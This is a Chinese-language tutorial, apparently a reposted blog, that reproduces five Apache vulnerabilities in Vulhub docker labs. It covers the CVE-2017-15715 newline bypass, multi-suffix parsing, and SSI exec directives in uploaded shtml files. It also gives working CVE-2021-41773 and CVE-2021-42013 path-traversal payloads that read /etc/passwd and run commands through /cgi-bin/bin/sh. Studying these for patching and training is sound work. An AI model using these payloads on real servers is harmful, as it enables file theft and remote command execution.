中间件安全—Apache常见漏洞
中间件安全—Apache常见漏洞[*] 1.Apache常见漏洞
[*] * 1.1.Apache介绍
[*] 1.2.Apache HTTPD 换行解析漏洞(CVE-2017-15715)
[*] * 1.2.1.漏洞介绍
[*] 1.2.2.漏洞环境
[*] * 1.2.2.1.运行漏洞环境
[*]1.2.2.2.访问漏洞环境
[*] 1.2.3.漏洞复现
[*] * 1.2.3.1.拦截
[*]1.2.3.2.添加换行
[*]1.2.3.3.访问文件
[*] 1.3.Apache多后缀解析漏洞(apache_parsing_vulnerability)
[*] * 1.3.1.漏洞介绍
[*] 1.3.2.漏洞环境
[*] * 1.3.2.1.运行漏洞环境
[*]1.3.2.2.访问漏洞环境
[*] 1.3.3.漏洞复现
[*] * 1.3.3.1.拦截
[*]1.3.3.2.添加后缀
[*]1.3.3.3.访问文件
[*] 1.4.Apache HTTP 路径穿越漏洞(CVE-2021-41773)
[*] * 1.4.1.漏洞介绍
[*] 1.4.2.漏洞环境
[*] * 1.4.2.1.运行漏洞环境
[*]1.4.2.2.访问漏洞环境
[*] 1.4.3.漏洞复现
[*] * 1.4.3.1.抓包
[*]1.4.3.2.读取恣意文件
[*]1.4.3.3.实行恣意下令
[*] 1.5.Apache HTTP 路径穿越漏洞(CVE-2021-42013)
[*] * 1.5.1.漏洞介绍
[*] 1.5.2.漏洞环境
[*] * 1.5.2.1.运行漏洞环境
[*]1.5.2.2.访问漏洞环境
[*] 1.5.3.漏洞复现
[*] * 1.5.3.1.抓包
[*]1.5.3.2.读取恣意文件
[*] 1.6.Apache SSI 长途下令实行漏洞
[*] * 1.6.1.漏洞介绍
[*] 1.6.2.漏洞环境
[*] * 1.6.2.1.运行漏洞环境
[*]1.6.2.2.访问漏洞环境
[*] 1.6.3.漏洞复现
[*] * 1.6.3.1.编辑文件
[*]1.6.3.2.上传文件
[*]1.6.3.3.访问文件
1.Apache常见漏洞
1.1.Apache先容
简单先容一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎全部广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。
1.2.Apache HTTPD 换行解析漏洞(CVE-2017-15715)
1.2.1.漏洞先容
Apache
HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀举行解析,导致绕过一些服务器的安全策略。
1.2.2.漏洞环境
这里采用Vulhub一键搭建漏洞测试靶场,来举行漏洞复现。
1.2.2.1.运行漏洞环境
docker-compose build
docker-compose up -d
![在这里插入图片描述](https://img-
blog.csdnimg.cn/3b354888ab454b7a8c5f9dc0caae8f87.png#pic_center)
1.2.2.2.访问漏洞环境
http://your-ip
:8080
![在这里插入图片描述](https://img-
blog.csdnimg.cn/0acc9e9c0400442997e28236c1a3f105.png#pic_center)
1.2.3.漏洞复现
1.2.3.1.拦截
正常上传php文件就会出现上传失败。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/c98f2e8e3b1f43c5a332f55c4a93f51c.png#pic_center)
1.2.3.2.添加换行
在1.php背面插入一个\x0A(注意,不能是\x0D\x0A,只能是一个\x0A),不再拦截,这里只必要选中0d,右击选择insert
byte…后,输入0a即可插入至内里,然后发送。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/fbbf551a2c39414992122683d23493ca.png#pic_center)
1.2.3.3.访问文件
这里访问地址即可。
链接:http:ip地址:端口/文件名.php%0a
![在这里插入图片描述](https://img-
blog.csdnimg.cn/845e1d100db444d9b4238abf6308c0d1.png#pic_center)
1.3.Apache多后缀解析漏洞(apache_parsing_vulnerability)
1.3.1.漏洞先容
apache
httpd支持一个文件多个后缀,windows对于多后缀的识别是看最后一个“.”之后的后缀名。apache对于多后缀文件的识别是从后往前识别,最后一个后缀不能被识别时,会往前识别。
1.3.2.漏洞环境
1.3.2.1.运行漏洞环境
docker-compose up -d
![在这里插入图片描述](https://img-
blog.csdnimg.cn/975c7d1469ee4869a434cdb3bb4c86a4.png#pic_center)
1.3.2.2.访问漏洞环境
http://your-ip
![在这里插入图片描述](https://img-
blog.csdnimg.cn/ad184a8315ca4b0fa53094fc0ccb7186.png#pic_center)
1.3.3.漏洞复现
1.3.3.1.拦截
由于设置了白名单,正常在上传php后缀文件后,会被拦截,无法正常举行上传。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/554b3f2da3fe4a21a2edcfab19650fb8.png#pic_center)
1.3.3.2.添加后缀
由于特性原因,我们可以在背面添加不认识的后缀,大概其它后缀均可。这里我添加.jpg,形成1.php.jpg文件。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/4e7c4877ae634098bd502619e79332f7.png#pic_center)
1.3.3.3.访问文件
通过返回的信息得到,我们是乐成上传了我们的文件,并返回一个路径,我们在欣赏器中访问一下文件,验证一下是否正常实行为php文件。
http://IP地址/uploadfiles/1.php.jpg
![在这里插入图片描述](https://img-
blog.csdnimg.cn/0b4da3522803489cb8c0828734c2db83.png#pic_center)
1.4.Apache HTTP 路径穿越漏洞(CVE-2021-41773)
1.4.1.漏洞先容
在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
版本等于2.4.49
穿越的目次允许被访问(默认环境下是不允许的)
攻击者利用这个漏洞,可以读取位于Apache服务器Web目次以外的其他文件,大概读取Web目次中的脚本文件源码,大概在开启了cgi或cgid的服务器上实行恣意下令。
1.4.2.漏洞环境
1.4.2.1.运行漏洞环境
docker-compose build
docker-compose up -d
![在这里插入图片描述](https://img-
blog.csdnimg.cn/c61a50dae25847aab581cd70104b7993.png#pic_center)
1.4.2.2.访问漏洞环境
在这里插入代码片
http://your-ip
:8080
![在这里插入图片描述](https://img-
blog.csdnimg.cn/139d64ab3b734c35b006e26406d6b6c4.png#pic_center)
1.4.3.漏洞复现
1.4.3.1.抓包
首先这里先抓原始的包。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/ee4af34b26d2461282689c23b20e8d53.png#pic_center)
1.4.3.2.读取恣意文件
在GET处插入POC,用来读取恣意文件,但是必要注意/icons必须是一个存在且可访问的目次。
POC:/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
![在这里插入图片描述](https://img-
blog.csdnimg.cn/eb576457e65347ea9b0bc1137cca7e06.png#pic_center)
1.4.3.3.实行恣意下令
在服务端开启了cgi或cgid这两个mod的环境下,这个路径穿越漏洞将可以实行恣意下令。
POC:/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 最下面添加echo;id
![在这里插入图片描述](https://img-
blog.csdnimg.cn/4a37f6a4e57748f8b69207a23e22208c.png#pic_center)
1.5.Apache HTTP 路径穿越漏洞(CVE-2021-42013)
1.5.1.漏洞先容
Apache官方在2.4.50版本中对2.4.49版本中出现的目次穿越漏洞CVE-2021-41773举行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。
攻击者利用这个漏洞,可以读取位于Apache服务器Web目次以外的其他文件,大概读取Web目次中的脚本文件源码,大概在开启了cgi或cgid的服务器上实行恣意下令。
这个漏洞可以影响Apache HTTP Server 2.4.49以及2.4.50两个版本。
1.5.2.漏洞环境
1.5.2.1.运行漏洞环境
docker-compose build
docker-compose up -d
![在这里插入图片描述](https://img-
blog.csdnimg.cn/0e1feea946454caf85a416fee65ee2b6.png#pic_center)
1.5.2.2.访问漏洞环境
http://your-ip
:8080
![在这里插入图片描述](https://img-
blog.csdnimg.cn/724230186312472bae4924536d09706f.png#pic_center)
1.5.3.漏洞复现
这里总体来说和CVE-2021-41773步骤都是一样的,只是将.%2e更换为.%%32%65,若使用原先的payload无法使用,那么就阐明2.4.50举行了修复。
1.5.3.1.抓包
首先这里先抓原始的包。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/02171b6cd8c24caa8fe89f73918c3410.png#pic_center)
1.5.3.2.读取恣意文件
在GET处插入POC,用来读取恣意文件,但是必要注意/icons必须是一个存在且可访问的目次。
POC:/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
![在这里插入图片描述](https://img-
blog.csdnimg.cn/a4644e7f77714efd9e8f1a854c35f0f6.png#pic_center)
1.6.Apache SSI 长途下令实行漏洞
1.6.1.漏洞先容
在测试恣意文件上传漏洞的时候,目的服务端可能不允许上传php后缀的文件。假如目的服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法实行恣意下令。
1.6.2.漏洞环境
1.6.2.1.运行漏洞环境
docker-compose up -d
![在这里插入图片描述](https://img-
blog.csdnimg.cn/6a122fb660074e4ea6c41a6337cd812c.png#pic_center)
1.6.2.2.访问漏洞环境
http://your-ip
:8080
![在这里插入图片描述](https://img-
blog.csdnimg.cn/22251d2caa374018bf9840502db6e183.png#pic_center)
1.6.3.漏洞复现
1.6.3.1.编辑文件
正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件,然后在文件中写入下令。
命令:<!--#exec cmd="ls" -->
1.6.3.2.上传文件
这里我们将文件举行上传,可以看到是乐成上传了。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/809cf7b6b29a41ecbcb6f57ee3ce4afa.png#pic_center)
1.6.3.3.访问文件
可以看到乐成显示目次下存在的文件。
![在这里插入图片描述](https://img-
blog.csdnimg.cn/c5ead972166448ffb0c69d924746ea56.png#pic_center)
最后
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同砚们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门水平而已,能力越强机会才越多。
因为入门学习阶段知识点比力杂,以是我讲得比力笼统,各人假如有不懂的地方可以找我咨询,我保证知无不言言无不尽,必要相干资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
干货重要有:
①1000+CTF历届题库(主流和经典的应该都有了)
②CTF技术文档(最全中文版)
③项目源码(四五十个有趣且经典的练手项目及源码)
④ CTF大赛、web安全、渗透测试方面的视频(得当小白学习)
⑤ 网络安全学习路线图(告别不入流的学习)
⑥ CTF/渗透测试工具镜像文件大全
⑦ 2023密码学/隐身术/PWN技术手册大全
假如你对网络安全入门感爱好,那么你必要的话可以点击这里
页:
[1]